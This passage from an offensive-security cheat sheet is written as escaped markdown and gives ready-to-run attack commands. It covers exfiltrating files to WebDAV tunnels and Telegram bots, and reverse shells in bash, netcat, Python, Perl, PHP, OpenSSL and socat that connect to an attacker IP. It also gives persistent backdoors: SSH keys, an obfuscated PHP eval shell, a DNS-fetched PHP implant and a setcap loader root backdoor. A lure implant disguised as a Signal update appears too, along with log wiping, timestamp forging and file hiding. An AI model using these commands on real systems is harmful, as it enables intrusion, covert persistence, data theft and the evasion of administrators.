`exfil` on segfault.net.\n\n---\n\u003ca id=\"webdav\"\u003e\u003c/a\u003e\n### 4.x. File transfer - using WebDAV\n\nOn the receiver (e.g. segfault.net) start a Cloudflare-Tunnel and WebDAV:\n```sh\ncloudflared tunnel --url localhost:8080 \u0026\n# [...]\n# +--------------------------------------------------------------------------------------------+\n# | Your quick Tunnel has been created! Visit it at (it may take some time to be reachable): |\n# | https://example-foo-bar-lights.trycloudflare.com |\n# +--------------------------------------------------------------------------------------------+\n# [...]\nwsgidav --port=8080 --root=. --auth=anonymous\n```\n\nOn another server:\n```sh\n# Upload a file to your workstation\ncurl -T file.dat https://example-foo-bar-lights.trycloudflare.com\n# Create a directory remotely\ncurl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources\n# Create a directory hierarchy remotely\nfind . -type d | xargs -I{} curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources/{}\n# Upload all *.c files (in parallel):\nfind . -name '*.c' | xargs -P10 -I{} curl -T{} https://example-foo-bar-lights.trycloudflare.com/sources/{}\n```\n\nAccess the share from Windows (to drag \u0026 drop files) in File Explorer:\n```\n\\\\example-foo-bar-lights.trycloudflare.com@SSL\\sources\n```\n\nOr mount the WebDAV share on Windows (Z:/):\n```\nnet use * \\\\example-foo-bar-lights.trycloudflare.com@SSL\\sources\n```\n\n---\n\u003ca id=\"tg\"\u003e\u003c/a\u003e\n### 4.xi. File transfer to Telegram\n\nThere are [zillions of upload services](#cloudexfil) but TG is a neat alternative. Get a _TG-Bot-Token_ from the [TG BotFather](https://www.siteguarding.com/en/how-to-get-telegram-bot-api-token). Then create a new TG group and add your bot to the group. Retrieve the _chat_id_ of that group:\n```sh\ncurl -s \"https://api.telegram.org/bot\u003cTG-BOT-TOKEN\u003e/getUpdates\" | jq -r '.result[].message.chat.id' | uniq\n# If you get only {\"ok\":true,\"result\":[]} then remove and add the bot again.\n```\n\n```sh\n# Upload file.zip straight into the group chat:\ncurl -sF document=@file.zip \"https://api.telegram.org/bot\u003cTG-BOT-TOKEN\u003e/sendDocument?chat_id=\u003cTG-CHAT-ID\u003e\"\n```\n\n---\n\u003ca id=\"reverse-shell\"\u003e\u003c/a\u003e\n## 5. Reverse Shell / Dumb Shell\n\u003ca id=\"reverse-shell-gs-netcat\"\u003e\u003c/a\u003e\n**5.i.a. Reverse shell with gs-netcat (encrypted)**\n\nUse [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell. Both, the YOU and the remote system, can be behind NAT and the traffic is routed via a relay network. It also supports file upload/download (Ctrl-e c) and alarms when the admin logs in. If netcat is a swiss army knife than gs-netcat is a german battle axe :\u003e\n\n```sh\nX=ExampleSecretChangeMe bash -c \"$(curl -fsSL https://gsocket.io/y)\"\n# or X=ExampleSecretChangeMe bash -c \"$(wget --no-verbose -O- https://gsocket.io/y)\"\n```\n\nTo connect to the shell from your workstation:\n```sh\nS=ExampleSecretChangeMe bash -c \"$(curl -fsSL https://gsocket.io/y)\"\n# or gs-netcat -s ExampleSecretChangeMe -i\n# Add -T to tunnel through TOR\n```\n\n\u003ca id=\"reverse-shell-bash\"\u003e\u003c/a\u003e\n**5.i.b. Reverse shell with Bash**\n\nStart netcat to listen on port 1524 on your system:\n```sh\nnc -nvlp 1524\n```\nAfter connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat:\n```sh\npwncat -lp 1524\n# Press \"Ctrl-C\" if pwncat gets stuck at \"registered new host ...\".\n# Then type \"back\" to get the prompt of the remote shell.\n```\n\nOn the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:\n```sh\n# If the current shell is Bash already:\n(bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261) \u0026\n# If the current shell is NOT Bash then we need:\nbash -c '(exec bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261) \u0026'\n# or hide the bash process as 'kqueue'\nbash -c '(exec -a kqueue bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261) \u0026'\n```\n\n\u003ca id=\"curlshell\"\u003e\u003c/a\u003e\n**5.i.c. Reverse shell with cURL (encrypted)**\n\nUse [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connection to the outside world is prohibited:\n```sh\n# On YOUR workstation\n# Generate SSL keys:\nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj \"/CN=THC\"\n# Start your listening server:\n./curlshell.py --certificate cert.pem --private-key key.pem --listen-port 8080\n```\n```sh\n# On the target:\ncurl -skfL https://3.13.3.7:8080 | bash\n```\n\n\u003ca id=\"curltelnet\"\u003e\u003c/a\u003e\n**5.i.d Reverse shell with cURL (cleartext)**\n\nStart ncat to listen for multiple connections:\n```sh\nncat -kltv 1524\n```\n```sh\n# On the target:\nC=\"curl -Ns telnet://3.13.3.7:1524\"; $C \u003c/dev/null 2\u003e\u00261 | sh 2\u003e\u00261 | $C \u003e/dev/null\n```\n\n\u003ca id=\"sslshell\"\u003e\u003c/a\u003e\n**5.i.e. Reverse shell with OpenSSL (encrypted)**\n\n```sh\n# On YOUR workstation:\n# Generate SSL keys:\nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj \"/CN=THC\"\n# Start your listening server:\nopenssl s_server -port 1524 -cert cert.pem -key key.pem\n# Or pwncat:\n# pwncat -lp 1524 --ssl\n```\n\n```sh\n# On the target, start an openssl reverse shell as background process:\n({ openssl s_client -connect 3.13.3.7:1524 -quiet \u003c/dev/fd/3 3\u003e\u0026- 2\u003e/dev/null | sh 2\u003e\u00263 \u003e\u00263 3\u003e\u0026- ; } 3\u003e\u00261 | : \u0026 )\n```\n\n\u003ca id=\"reverse-shell-no-bash\"\u003e\u003c/a\u003e\n**5.i.f. Reverse shell without /dev/tcp**\n\nEmbedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:\n\nOn the remote system:\n\n```sh\nnc -e /bin/sh -vn 3.13.3.7 1524\n```\n\nVariant if *'-e'* is not supported:\n```sh\n{ nc -vn 3.13.3.7 1524 \u003c/dev/fd/3 3\u003e\u0026- | sh 2\u003e\u00263 \u003e\u00263 3\u003e\u0026- ; } 3\u003e\u00261 | :\n```\n\n* On modern shells this can be shortened to `{ nc 3.13.3.7 1524 \u003c/dev/fd/2|sh;} 2\u003e\u00261|:`. (*thanks IA_PD*). \n* The `| :` trick won't work on C-Shell/tcsh (FreeBSD), original Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead.\n\nVariant for older */bin/sh*:\n```sh\nmkfifo /tmp/.io; sh -i 2\u003e\u00261 \u003c/tmp/.io | nc -vn 3.13.3.7 1524 \u003e/tmp/.io\n```\n\nTelnet variant:\n```sh\nmkfifo /tmp/.io; sh -i 2\u003e\u00261 \u003c/tmp/.io | telnet 3.13.3.7 1524 \u003e/tmp/.io\n```\n\nTelnet variant when mkfifo is not supported (Ulg!):\n```sh\ntouch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 \u003e/tmp/.fio\n```\nNote: Dont forget to `rm /tmp/.fio` after login.\n\n\u003ca id=\"sshx\"\u003e\u003c/a\u003e\n**5.i.g. Reverse shell with sshx.io (encrypted)**\n\nAccess a remote shell from your web browser [https://sshx.io](https://sshx.io).\n\n```shell\ncurl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2\u003e/dev/null \u003e.s \\\n\u0026\u0026 chmod 755 .s \\\n\u0026\u0026 (PATH=.:$PATH .s -q \u003e.u 2\u003e/dev/null \u0026);\nfor _ in {1..10}; do [ -s .u ] \u0026\u0026 break;sleep 1;done;cat .u;rm -f .u .s;\n```\n\nOr pipe directly into memory:\n```shell\ncd /tmp;(curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2\u003e/dev/null|perl '-efor(319,279){($f=syscall$_,$\",1)\u003e0\u0026\u0026last};open($o,\"\u003e\u0026=\".$f);print$o(\u003cSTDIN\u003e);exec{\"/proc/$$/fd/$f\"}\"/usr/bin/python3\",@ARGV' -- \"-q\" \u003e.u 2\u003e/dev/null \u0026);sleep 10;cat .u\u0026\u0026rm -f .u\n```\n\n\u003ca id=\"revese-shell-remote-moe\"\u003e\u003c/a\u003e\n**5.i.h. Reverse shell with remote.moe and ssh (encrypted)**\n\nIt is possible to tunnel raw TCP (e.g bash reverse shell) through [remote.moe](https://remote.moe):\n\nOn your workstation:\n```sh\n# First Terminal - Create a remote.moe tunnel to your workstation\nssh-keygen -q -t rsa -N \"\" -f .r # New key creates a new remote.moe-address\nssh -i .r -R31337:0:8080 -o StrictHostKeyChecking=no nokey@remote.moe; rm -f .r\n# Note down the 'remote.moe' address which will look something like\n# uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe\n\n# Second Terminal - start listening for the reverse shell\nnc -vnlp 8080\n```\n\nOn the target(needs SSH and Bash):\n```sh\nbash -c '(killall ssh; rm -f /tmp/.r; ssh-keygen -q -t rsa -N \"\" -f /tmp/.r; ssh -i /tmp/.r -o StrictHostKeyChecking=no -L31338:uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 -Nf remote.moe; bash -i \u0026\u003e/dev/tcp/0/31338 0\u003e\u00261 \u0026)'\n```\n\nOn the target (alternative; needs ssh, bash and mkfifo):\n```sh\nrm -f /tmp/.p /tmp/.r; ssh-keygen -q -t rsa -N \"\" -f /tmp/.r \u0026\u0026 mkfifo /tmp/.p \u0026\u0026 (bash -i\u003c/tmp/.p 2\u003e1 |ssh -i /tmp/.r -o StrictHostKeyChecking=no -W uydsgl6i62nrr2zx3bgkdizlz2jq2muplpuinfkcat6ksfiffpoa.remote.moe:31337 remote.moe\u003e/tmp/.p \u0026)\n```\n\n\u003ca id=\"reverse-shell-python\"\u003e\u003c/a\u003e\n**5.i.i. Reverse shell with Python**\n```sh\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.13.3.7\",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n```\n\n\u003ca id=\"reverse-shell-perl\"\u003e\u003c/a\u003e\n**5.i.j. Reverse shell with Perl**\n\n```sh\n# method 1\nperl -e 'use Socket;$i=\"3.13.3.7\";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n# method 2\nperl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"3.13.3.7:1524\");STDIN-\u003efdopen($c,r);$~-\u003efdopen($c,w);while(\u003c\u003e){if($_=~ /(.*)/){system $1;}};'\n```\n\u003ca id=\"reverse-shell-php\"\u003e\u003c/a\u003e\n**5.i.k. Reverse shell with PHP**\n\n```sh\nphp -r '$sock=fsockopen(\"3.13.3.7\",1524);exec(\"/bin/bash -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\n```\n\n\u003ca id=\"reverse-shell-upgrade\"\u003e\u003c/a\u003e\n\u003ca id=\"reverse-shell-pty\"\u003e\u003c/a\u003e\n**5.ii.a. Upgrade a reverse shell to a PTY shell**\n\nAny of the above reverse shells are limited. For example *sudo bash* or *top* will not work. To make these work we have to upgrade the shell to a real PTY shell:\n\n```sh\n# Using script\nexec script -qc /bin/bash /dev/null # Linux\nexec script -q /dev/null /bin/bash # BSD\n```\n\n```sh\n# Using python\nexec python -c 'import pty; pty.spawn(\"/bin/bash\")'\n```\n\n\u003ca id=\"reverse-shell-interactive\"\u003e\u003c/a\u003e\n**5.ii.b. Upgrade a reverse shell to a fully interactive shell**\n\n...and if we also like to use Ctrl-C etc then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell:\n\n```sh\n# On the target host spawn a PTY using any of the above examples:\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n# Now Press Ctrl-Z to suspend the connection and return to your own terminal.\n```\n\n```\n# On your terminal execute:\nstty raw -echo icrnl opost; fg\n```\n\n```sh\n# On target host\nexport SHELL=/bin/bash\nexport TERM=xterm-256color\nreset -I\nstty -echo;printf \"\\033[18t\";read -rdt R;stty sane $(echo \"${R:-8;80;25}\"|awk -F\";\" '{ printf \"rows \"$3\" cols \"$2; }')\n# Pimp up your prompt\n# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d\" \" /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \\[\\e[36m\\]\\u\\[\\e[m\\]@\\[\\e[32m\\]\\h:\\[\\e[33;1m\\]\\w \\[\\e[0;31m\\]\\$\\[\\e[m\\] '\nPS1='\\[\\033[36m\\]\\u\\[\\033[m\\]@\\[\\033[32m\\]\\h:\\[\\033[33;1m\\]\\w\\[\\033[m\\]\\$ '\n```\n\n\u003ca id=\"reverse-shell-socat\"\u003e\u003c/a\u003e\n**5.ii.c. Reverse shell with socat (fully interactive)**\n\n...or install socat and get it done without much fiddling about:\n\n```sh\n# on attacker's host (listener)\nsocat file:`tty`,raw,echo=0 tcp-listen:1524\n# on target host (reverse shell)\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524\n```\n\n---\n\u003ca id=\"backdoor\"\u003e\u003c/a\u003e\n## 6. Backdoors\n\nMostly we use gs-netcat's automated deployment script: [https://www.gsocket.io/deploy](https://www.gsocket.io/deploy).\n```sh\nbash -c \"$(curl -fsSLk https://gsocket.io/y)\"\n```\nor\n```sh\nbash -c \"$(wget --no-check-certificate -qO- https://gsocket.io/y)\"\n```\n\nor deploy gsocket by running your own deployment server:\n```sh\nLOG=results.log bash -c \"$(curl -fsSL https://gsocket.io/ys)\" # Notice '/ys' instead of '/y'\n```\n\n\u003ca id=\"backdoor-background-reverse-shell\"\u003e\u003c/a\u003e\n**6.i. Background reverse shell**\n\nA reverse shell that keeps trying to connect back to us every 360 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. \n\n```sh\nsetsid bash -c 'while :; do bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261; sleep 360; done' \u0026\u003e/dev/null\n```\n\nor the user's *~/.profile* (also stops multiple instances from being started):\n```sh\nfuser /dev/shm/.busy \u0026\u003e/dev/null || nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3\u003c/dev/shm/.busy; bash -i \u0026\u003e/dev/tcp/3.13.3.7/1524 0\u003e\u00261 ; sleep 360; done' \u0026\u003e/dev/null \u0026\n```\n\n\u003ca id=\"backdoor-auth-keys\"\u003e\u003c/a\u003e\n**6.ii. authorized_keys**\n\nAdd your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :\u003e\n\n* It survives reboots.\n* It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.\n* We have even seen our key being copied to other companies!\n\nTip: Change the name at the end of the ssh public keyfile to something obscure like *backup@ubuntu* or the admin's real name:\n```\n$ cat id_rsa.pub\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0\n[...]\nu1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C\nc3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu\n```\n\u003ca id=\"backdoor-network\"\u003e\u003c/a\u003e\n**6.iii. Remote Access to an entire network**\n\nInstall [gs-netcat](https://github.com/hackerschoice/gsocket). It creates a SOCKS exit-node on the Host's private LAN which is accessible through the Global Socket Relay Network without the need to run your own relay-server (e.g. access the remote private LAN directly from your workstation):\n\n```sh\ngs-netcat -l -S # compromised Host\n```\n\nNow from your workstation you can connect to ANY host on the Host's private LAN:\n```sh\ngs-netcat -p 1080 # Your workstation.\n\n# Access route.local:22 on the Host's private LAN from your Workstation:\nsocat - \"SOCKS4a:127.1:route.local:22\"\n```\nRead [Use any tool via Socks Proxy](#scan-proxy).\n\nOther methods:\n* [Gost/Cloudflared](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) - our very own article\n* [Reverse Wireguard](https://thc.org/segfault/wireguard) - from segfault.net to any (internal) network.\n\n\u003ca id=\"php-backdoor\"\u003e\u003c/a\u003e\n**6.iv. Smallest PHP Backdoor**\n\nAdd this line at the beginning of any PHP file:\n```php\n\u003c?php $i=base64_decode(\"aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K\");eval($i);?\u003e\n```\nIt is base64 encoding of:\n```php\nif(isset($_POST[0])){system($_POST[0]);die;}\n```\n\nTest the backdoor:\n```sh\n### 1. Optional: Start a test PHP server\ncd /var/www/html \u0026\u0026 php -S 127.0.0.1:8080\n### Without executing a command\ncurl http://127.0.0.1:8080/test.php\n### With executing a command\ncurl http://127.0.0.1:8080/test.php -d 0=\"ps fax; uname -mrs; id\"\n```\n\nSometimes `system()` is prohibited. Add `eval()` to allow remote PHP-code execution as a backup. Hide within other base64-comments for some obfuscation:\n```php\n\u003c?PHP /*1rUY9TDs2wG8In1HkSQzqViVtX2nGidgu/RkzKNJbfho9NqtfTaww4GcR6bIGU+U1AJq\nUSOIjliQm4T/9HP6YS6IMhwoZzmr2iydbwDcVynDqtLjI5i7owLKmjbKnijTszoXP/dif9ZcbhtJ\nWQKmhCno0boYQQ2rjHgW3su1C7pYREPSdrYD/4QBpptJU7Djnm5zuyD2TXNjHXm/ZYUW+n4s3PM7\naWqzWzy*/if(isset($_POST[0])){eval($_POST[1]?:\"\");system($_POST[0]);die;}/*P\n0KKBW1rvtqxOK8L9Ok6y7Rulkl2um62KVxvVx/+kODDw4HZV5Yx/HK/7lG+X/IkK8LViCIuaedXl\nHM1wHBlDluhe8BN6pH33fn0bfFpjCDaKrKwK3QF6ExJu1JgKK9deyWUTcqbr0dhe7ZliOIldh3of\n+4qUjhVdK4SoeND/Dd+iwRAbhZKxaHfng4ADqdWrwjUPoyTjzOp6C3iDzunviiG0RC3iDuCY*/?\u003e\n```\n\nTrigger with any of these to execute comand or PHP code:\n```shell\n# Execute just command\ncurl http://127.0.0.1:8080/x.php -d0='id'\n# Execute just PHP code\ncurl http://127.0.0.1:8080/x.php -d0='' -d1='echo file_get_contents(\"/etc/hosts\");'\n```\n\n\u003ca id=\"reverse-dns-backdoor\"\u003e\u003c/a\u003e\n**6.v. Smallest reverse DNS-tunnel Backdoor**\n\nExecute arbitrary commands on a server that is _not_ accessible from the public Internet by using a reverse DNS trigger.\n\nAdd this line (the implant) at the beginning of any PHP file:\n```php\n\u003c?PHP eval(base64_decode(dns_get_record(\"b00m.team-teso.net\", DNS_TXT)[0]['txt'])); ?\u003e\n```\n\nThe implant requests the payload via a DNS TXT-request from the domain `b00m.team-teso.net`. When triggered, it creates `/tmp/.b00m` and notifies THC (via an app.interactsh.com callback). *Please* use your own domain and also create your own payload. Example:\n```shell\necho -n '@system(\"{ id; date;}\u003e/tmp/.b00m 2\u003e/dev/null\");' |base64 -w0\n```\n\n- The DNS TXT payload is limited to 2,048 characters (sometimes 65,535 characters).\n- The implant is a `bootloader`. Use a while loop to download and execute larger paypload via DNS.\n- Check out our favorite places to [register a domain anonymously](#pub): \n\nCan also be triggered via `~/.bashrc` or the user's crontab. Use (example):\n```shell\n# Use a \"double bash\" to redirect _also_ $()-subshell error to /dev/null:\nbash -c 'exec bash -c \"{ $(dig +short b00m2.team-teso.net TXT|tr -d \\ \\\"|base64 -d);}\"'\u0026\u003e/dev/null\n```\n\n\u003ca id=\"ld-backdoor\"\u003e\u003c/a\u003e\n**6.vi. Local Root Backdoor**\n\n#### 1. Backdooring the dynamic loader with setcap\n\n```bash\n### Execute as ROOT user\nfn=\"$(readlink -f /lib64/ld-*.so.*)\" || fn=\"$(readlink -f /lib/ld-*.so.*)\" || fn=\"/lib/ld-linux.so.2\"\nsetcap cap_setuid,cap_setgid+ep \"${fn}\"\n```\n\n```bash\n### Execute as non-root user to get root\nfn=\"$(readlink -f /lib64/ld-*.so.*)\" || fn=\"$(readlink -f /lib/ld-*.so.*)\" || fn=\"/lib/ld-linux.so.2\"\np=\"$(command -v python3 2\u003e/dev/null)\" || p=\"$(command -v python)\"\n\"${fn:?}\" \"$p\" -c 'import os;os.setuid(0);os.setgid(0);os.execlp(\"bash\", \"kdaemon\")'\n```\n\n#### 2. Good old b00m shell\n\n```shell\n{ cp /bin/sh /var/tmp/.b00m; chmod 6775 /var/tmp/.b00m; } 2\u003e/dev/null \u003e/dev/null\n```\n\n```shell\nexec /var/tmp/.b00m -p -c 'exec python -c \"import os;os.setuid(0);os.execlp(\\\"bash\\\", \\\"kdaemon\\\")\"'\n```\n\n\u003ca id=\"implant\"\u003e\u003c/a\u003e\n**6.vii. Self-Extracting implant**\n\nCreate a self-extracting shell-script using [mkegg.sh](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/mkegg.sh) (see source for examples).\n\nSimple example:\n```sh\n# Create implant 'egg.sh' containing the file 'foo'\n# and the directory 'warez'. When executing 'egg.sh' then\n# extract 'foo' and 'warez' and call 'warez/run/sh'\n./mkegg.sh egg.sh foo warez warez/run.sh\n```\n\nReal world examples are best:\n1. Create an implant that installs gsocket and calls our webhook on success:\n```sh\n./mkegg.sh egg.sh deploy-all.sh '(GS_WEBHOOK_KEY=e90d4b38-8285-490d-b5ab-a6d5c7c990a7 deploy-all.sh 2\u003e/dev/null \u003e/dev/null \u0026)'\n# On the target system do: 'cat egg.sh | bash' or './egg.sh'\n```\n\n2. Rename `egg.sh` to `update-for-fools.txt` and upload as blob to [Signal's](https://www.signal.org/) GitHub repository.\n\n3. Don't fool people to update Signal using this command ❤️:\n```sh\ncurl -fL https://github.com/signalapp/Signal-Desktop/files/15037868/update-for-fools.txt | bash\n```\n\n\u003ca id=\"hostrecon\"\u003e\u003c/a\u003e\n## 7. Host Recon\n---\n\nGet [essential information](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/whatserver.sh) about a host:\n```sh\nbash -c \"$(curl -fsSL https://thc.org/ws)\"\n```\nor\n```sh\nbash -c \"$(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/whatserver.sh)\"\n```\n\nnetstat if there is no netstat/ss/lsof:\n```sh\ncurl -fsSL https://raw.githubusercontent.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/master/tools/awk_netstat.sh | bash\n```\n\nSpeed check the system\n```sh\ncurl -fsSL https://bench.sh | bash\n# Another speed check: \n# curl -fsSL https://yabs.sh | bash\n```\n\nFind all suid/sgid binaries:\n```\nfind / -xdev -type f -perm /6000 -ls 2\u003e/dev/null\n```\n\nFind all writeable directories:\n```bash\nwfind() {\n local arr dir\n\n arr=(\"$@\")\n while [[ ${#arr[@]} -gt 0 ]]; do\n dir=${arr[${#arr[@]}-1]}\n unset \"arr[${#arr[@]}-1]\"\n find \"$dir\" -maxdepth 1 -type d -writable -ls 2\u003e/dev/null\n IFS=$'\\n' arr+=($(find \"$dir\" -mindepth 1 -maxdepth 1 -type d ! -writable 2\u003e/dev/null))\n done\n}\n# Usage: wfind /\n# Usage: wfind /etc /var /usr \n```\n\nFind local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)):\n```sh\ncurl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static\nchmod 700 np \u0026\u0026 \\\n./np scan . \u0026\u0026 \\\n./np report --color=always | less -R\n```\n(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history)\n\nUsing `grep`:\n```sh\n# Find passwords (without garbage).\ngrep -HEronasi '.{,16}password.{,64}' .\n# Find TLS or OpenSSH keys:\ngrep -r -F -- \" PRIVATE KEY-----\" .\n```\n\nFind Subdomains or emails in files:\n```bash\nresolv() { while read -r x; do r=\"$(getent hosts \"$x\")\" || continue; echo \"${r%% *}\"$'\\t'\"${x}\"; done; }\nfind_subdomains() {\n\tlocal d=\"${1//./\\\\.}\"\n\tlocal rexf='[0-9a-zA-Z_.-]{0,64}'\"${d}\"\n\tlocal rex=\"$rexf\"'([^0-9a-zA-Z_]{1}|$)'\n\t[ $# -le 0 ] \u0026\u0026 { echo -en \u003e\u00262 \"Extract sub-domains from all files (or stdin)\\nUsage : find_subdomains \u003capex-domain\u003e \u003cfile\u003e\\nExample: find_subdomain .com | anew\"; return; }\n\tshift 1\n\t[ $# -le 0 ] \u0026\u0026 [ -t 0 ] \u0026\u0026 set -- .\n\tcommand -v rg \u003e/dev/null \u0026\u0026 { rg -oaIN --no-heading \"$rex\" \"$@\" | grep -Eao \"$rexf\"; return; }\n\tgrep -Eaohr \"$rex\" \"$@\" | grep -Eo \"$rexf\"\n}\n# find_subdomain .foobar.com | anew | resolv\n# find_subdomain @gmail.com | anew\n```\n\n---\n\u003ca id=\"shell-hacks\"\u003e\u003c/a\u003e\n## 8. Shell Hacks\n\u003ca id=\"shred\"\u003e\u003c/a\u003e\n**8.i. Shred \u0026 Erase a file**\n\n```sh\nshred -z foobar.txt\n```\n\n```sh\n## SHRED without shred command\nshred() {\n [[ -z $1 || ! -f \"$1\" ]] \u0026\u0026 { echo \u003e\u00262 \"shred [FILE]\"; return 255; }\n dd status=none bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom \u003e\"$1\"\n rm -f \"${1:?}\"\n}\nshred foobar.txt\n```\nNote: Or deploy your files in */dev/shm* directory so that no data is written to the harddrive. Data will be deleted on reboot.\n\nNote: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.\n\n\u003ca id=\"restore-timestamp\"\u003e\u003c/a\u003e\n**8.ii. Restore the date of a file**\n\nLet's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modified. Use *touch* to change the file date to the date of another file (in this example, */etc/shadow*)\n\n```sh\ntouch -r /etc/shadow /etc/passwd\n# verify with 'stat /etc/passwd'\n```\n\nUse [hackshell](#hackshell) and `ctime /etc/passwd` to also adjust the ctime and birth-time.\n\n\u003ca id=\"shell-clean-logs\"\u003e\u003c/a\u003e\n**8.iii. Clear logfile**\n\nThis will reset the logfile to 0 without having to restart syslogd etc:\n```sh\n\u003e/var/log/auth.log # or on old shells: cat /dev/null \u003e/var/log/auth.log\n```\n\nThis will remove any line containing the IP `1.2.3.4` from the log file:\n```sh\nxlog() { local a=$(sed \"/${1:?}/d\" \u003c\"${2:?}\") \u0026\u0026 echo \"$a\" \u003e\"${2:?}\"; }\n```\n\nExamples:\n```sh\n# xlog \"1\\.2\\.3\\.4\" /var/log/auth.log\n# xlog \"${SSH_CLIENT%% *}\" /var/log/auth.log\n# xlog \"^2023.* thc\\.org\" foo.log\n```\n\n\u003ca id=\"shell-hide-files\"\u003e\u003c/a\u003e\n**8.iv. Hide files from that User without root privileges**\n\nOur favorite working directory is */dev/shm/*. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME.\n\nHiding permanent files:\n\nMethod 1:\n```sh\nalias ls='ls -I system-dev'\n```\n\nThis will hide the directory *system-dev* from the *ls* command. Place in User's *~/.profile* or system wide */etc/profile*.\n\nMethod 2:\nTricks from the 80s. Consider any directory that the admin rarely looks into (like */boot/.X11/..* or so):\n```sh\nmkdir '...'\ncd '...'\n```\n\nMethod 3:\nUnix allows filenames with about any ASCII character but 0x00. Try tab (*\\t*). Happens that most Admins do not know how to cd into any such directory.\n```sh\nmkdir $'\\t'\ncd $'\\t'\n```\n\n\u003ca id=\"perm-files\"\u003e\u003c/a\u003e\n**8.v. Make a file immuteable**\n\nThis will redirect `/var/www/cgi/blah.cgi` to `/boot/backdoor.cgi`. The file `blah.cgi` can not be modified or removed (unless unmounted).\n```sh\n# /boot/backdoor.cgi contains our backdoor\ntouch /var/www/cgi/blah.cgi\nmount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi\n```\n\n\u003ca id=\"nosudo\"\u003e\u003c/a\u003e\n**8.vi. Change user without sudo/su**\n\nNeeded for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`)\n```bash\nxsu() {\n local name=\"${1:?}\"\n local u g h\n local cmd=\"python\"\n\n command -v python3 \u003e/dev/null \u0026\u0026 cmd=\"python3\"\n [ $UID -ne 0 ] \u0026\u0026 { HS_ERR \"Need root\"; return; }\n u=$(id -u ${name:?}) || return\n g=$(id -g ${name:?}) || return\n h=\"$(grep \"^${name}:\" /etc/passwd | cut -d: -f6)\" || return\n HOME=\"${h:-/tmp}\" \"$cmd\" -c \"import os;os.setgid(${g:?});os.setuid(${u:?});os.execlp('bash', 'bash')\"\n}\n# xsu user\n```\n\n\u003ca id=\"payload\"\u003e\u003c/a\u003e\n**8.vii. Obfuscate and crypt paypload**\n\nUse [UPX](https://github.com/upx/upx) to pack an ELF binary (example `/bin/id`):\n```shell\nBIN=\"mybin\"\nupx -qqq /bin/id 